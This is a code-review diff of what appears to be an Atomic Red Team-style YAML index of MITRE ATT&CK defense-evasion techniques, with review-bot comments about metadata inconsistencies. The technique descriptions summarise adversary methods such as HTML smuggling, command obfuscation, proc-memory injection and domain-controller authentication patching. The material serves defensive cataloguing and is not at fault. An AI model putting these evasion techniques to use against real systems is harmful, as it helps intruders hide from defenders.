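Review bot: the new T1070.010 object (`attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280`) is emitted without an `identifier:` key, while other techniques in this file with an equally empty `atomic_tests: []` do carry one (`identifier: T1027.006`, `identifier: T1622`, `identifier: T1221` further down), and the fully re-emitted T1578.002 / T1556.001 / T1556.005 objects below carry none. Whatever rule the generator applies for `identifier` is not visible from the output; please state it in the PR description or add the key here so new entries match the existing ones. Also note `x_mitre_detection: ''` is an empty string rather than an omitted key; confirm that is how the upstream bundle represents it so the next regeneration does not flip it back and forth.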
@@ -13640,10 +13896,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
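Review bot: `x_mitre_platforms` for T1556.009 drops the literal `Azure AD` and `SaaS` and adds `Identity Provider`, with only a 1.0 to 1.1 version bump. That is an upstream rename, not something to hand-edit, but any per-platform index in this repo that is keyed on the string `Azure AD` will silently lose this technique unless it is regenerated in the same change; worth a line in the PR description. For the record, `x_mitre_data_sources` still leads with `'Active Directory: Active Directory Object Modification'` for a technique that no longer lists a Windows/AD platform; that too is upstream content and is fine to leave as-is.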
@@ -13680,40 +13935,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
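Review bot: this hunk deletes the whole `external_references` block of T1578.002 only for the same four references (`Mandiant M-Trends 2020`, `AWS CloudTrail Search`, `Azure Activity Logs`, `Cloud Audit Logs`) to be re-emitted in a different order, and with `url`/`external_id` key order swapped, in the next hunk. A reviewer cannot confirm from the diff alone that no reference was dropped or altered in the shuffle. Please have the generator emit references and object keys in a stable order (sorted by `source_name`, or the upstream order) so that regenerations produce minimal, reviewable diffs; the same churn appears for T1556.001 and T1556.005 below.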
@@ -13722,20 +13947,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
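Review bot: the `Mandiant M-Trends 2020` reference changes URL from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` but keeps `Retrieved April 24, 2020` in its description, whereas the other URL updates in this diff (the nccgroup HTA post and the rfackroyd tweet) move the retrieval date together with the URL. If this is exactly what upstream now carries, say so; otherwise the date should move as well. The rest of the hunk (contributor `Arun Seelagan, CISA` added, `x_mitre_permissions_required: - User` dropped, version 1.1 to 1.2, spec 3.2.0) reads as a clean re-sync of the object.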
@@ -13765,7 +14020,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
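Review bot: `modified` for T1055.009 (Proc Memory) moves backwards here, from `2021-04-29T14:49:39.188Z` to `2020-06-20T22:25:55.331Z`. The same regression repeats below for T1601.001 (2021-04-29 to 2020-10-22), T1070.009 (2023-05-09 to 2023-04-11), T1221 (2022-05-11 to 2022-01-12), T1134 (2023-05-09 to 2023-03-30), Hidden File System (2021-04-29 to 2020-06-29), Thread Local Storage (2022-04-25 to 2021-10-18), T1622 (2022-05-11 to 2022-04-16) and T1574.002 (2023-05-09 to 2023-03-30). The old values cluster on a few identical stamps (`...14:49:39.188Z`, `...14:00:00.188Z`), which look like release-level bulk timestamps, so pulling the per-object time from a fresh bundle is a plausible explanation; but please name the ATT&CK bundle/version these objects were regenerated from in the PR, and check whether any consumer of this file sorts or caches on `modified`, because a backwards move would make such a consumer skip the refreshed objects.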
@@ -13808,8 +14063,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
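Review bot: this hunk deletes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.009 and adds nothing in their place, so the object now carries no attack-spec version at all, while the objects that were fully re-emitted in this diff (T1578.002, T1556.001, T1556.005, T1070.004, and the new T1070.010 / T1036.010) land on `x_mitre_attack_spec_version: 3.2.0`. Dropping the deprecated top-level `spec_version` is fine, but if an object did not get a fresh upstream copy it should keep its previous `x_mitre_attack_spec_version` value rather than lose it; the same applies to T1601.001, T1221, Hidden File System and Thread Local Storage further down.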
@@ -13856,7 +14109,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -13922,12 +14175,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -13982,33 +14233,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
- technique:
- x_mitre_platforms:
- - Windows
+ T1036.010:
+ technique:
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
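Review bot: the new T1036.010 description is emitted with a literal `\ \n\n` sequence (the `\ ` escaped space before the paragraph break) and a trailing space before the closing quote (`...rather than user or service account names. "`). That is stray whitespace from the upstream text that will now appear verbatim in every rendered index built from this file; the neighbouring new object T1070.010 is clean, so if the generator has a normalization pass for descriptions, apply it here too. As with T1070.010, this object has `x_mitre_detection: ''` and no `identifier:` key, so the same consistency question applies.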
@@ -14029,6 +14331,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -14043,22 +14346,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -14116,48 +14439,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
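Review bot: the `nccgroup Smuggling HTA 2017` URL changes to `https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/`, where `exploreredge` (no separator) looks like a typo but is presumably the slug upstream now uses; please confirm the link resolves before merging, since a dead replacement for a working `research.nccgroup.com` URL is worse than the original. The remaining deletions in this hunk are T1556.005's reference list, which is re-emitted below with `dump_pwd_dcsync` moved from last to first; that is the same stable-ordering issue already raised for T1578.002.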
@@ -14179,6 +14471,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -14189,23 +14482,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
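Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is dropped from T1556.005 with the 1.0 to 1.1 bump, as it was from T1578.002 (`User`) and T1556.001 (`Administrator`) above, but it is kept on the objects that only lost `spec_version` (T1601.001 `Administrator`, T1221 `User`, Hidden File System `User`/`Administrator`). After this change the field is present on some objects and absent on others for reasons unrelated to the technique itself, so any tooling that filters tests on it will behave inconsistently across the file. Either strip it everywhere in this PR (it is deprecated in the 3.x attack spec) or keep it on the re-synced objects too; mixing both is the worst of the options.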
@@ -14246,8 +14566,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -14283,43 +14604,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
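Review bot: T1070.004 is re-emitted from upstream (`modified` 2024-10-15, spec 3.2.0, `x_mitre_version` unchanged at 1.1, description and detection unchanged), yet its `name` is still `'Indicator Removal on Host: File Deletion'`, i.e. the old parent name plus the sub-technique name, while every other sub-technique in this diff is emitted with the bare upstream name (`Proc Memory`, `Patch System Image`, `Domain Controller Authentication`, `Reversible Encryption`, `HTML Smuggling`, `Command Obfuscation`). The parent technique has been `Indicator Removal` upstream for some time, so this prefix cannot have come from the bundle; only T1574.002 (`'Hijack Execution Flow: DLL Side-Loading'`) shares the form. If the generator special-cases entries that have atomic tests, document that; otherwise normalize the name.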
@@ -14330,18 +14631,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests:
- name: Delete a single file - FreeBSD/Linux/macOS
@@ -14469,7 +14788,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
